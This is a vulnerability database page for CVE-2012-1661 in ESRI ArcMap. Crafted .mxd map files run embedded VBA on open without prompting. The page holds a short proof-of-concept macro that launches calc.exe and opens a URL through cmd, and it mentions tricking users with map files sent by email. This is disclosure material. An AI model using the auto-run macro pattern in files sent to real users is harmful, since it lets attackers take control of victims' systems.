Lucene search
K

ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution

🗓️ 14 Jun 2012 00:00:00Reported by Boston Cyber DefenseType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

ESRI ArcMap arbitrary code execution via crafted map file. Flaw allows remote attacker to execute embedded VBA code by tricking user into opening mxd file via email

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ESRI ArcGIS 10.0.X / ArcMap 9 Arbitrary Code Execution
14 Jun 201200:00
zdt
CVE
CVE-2012-1661
12 Jul 201221:00
cve
Cvelist
CVE-2012-1661
12 Jul 201221:00
cvelist
EUVD
EUVD-2012-1671
12 Jul 201221:00
euvd
exploitpack
ESRI ArcGIS 10.0.x ArcMap 9 - Arbitrary Code Execution
14 Jun 201200:00
exploitpack
NVD
CVE-2012-1661
12 Jul 201221:55
nvd
Packet Storm
ESRI ArcMap Arbitrary Code Execution
14 Jun 201200:00
packetstorm
Prion
Code injection
12 Jul 201221:55
prion
Positive Technologies
PT-2012-3425 · Esri · Esri Arcgis +1
12 Jul 201200:00
ptsecurity
RedhatCVE
CVE-2012-1661
22 May 202504:05
redhatcve
Rows per page
=====
TITLE
=====

ESRI ArcMap Arbitrary Code Execution Via Crafted Map File

============
Description:
============

Opening a specially crafted mxd file will execute arbitrary
code without prompting and without a crash of the application.
This is due to a flaw in the programs ability to prompt a user
before executing embedded VBA. Mxd files are not filtered by
email systems so this allows a remote attacker to trick a user
into opening a map file via email and unknowingly gain control
over their system.

===============================
Versions affected (maybe more):
===============================
ArcMap 9

ArcGIS Desktop 10
Release Version: 10.0
Product Version: 10.0.1.2800
ArcGIS Service Pack: 1 (build 10.0.1.2800)

ArcGIS Desktop 10
Release Version: 10.0
Product Version: 10.0.2.3200
ArcGIS Service Pack: 2 (build 10.0.2.3200)

=================
Proof of concept:
=================

If the following macro is implemented in the project
the Shell statements will be executed when the
document is opened without prompt.

Private Function MxDocument_OpenDocument() As Boolean
Shell "calc.exe", vbNormalFocus
Shell "cmd /c start
http://www.cs.umb.edu/~joecohen/exploits/CVE-2012-1661.htm",
vbNormalFocus
End Function

Video at site:

http://www.cs.umb.edu/~joecohen/exploits/CVE-2012-1661

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2012 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 29.3
EPSS0.00717
36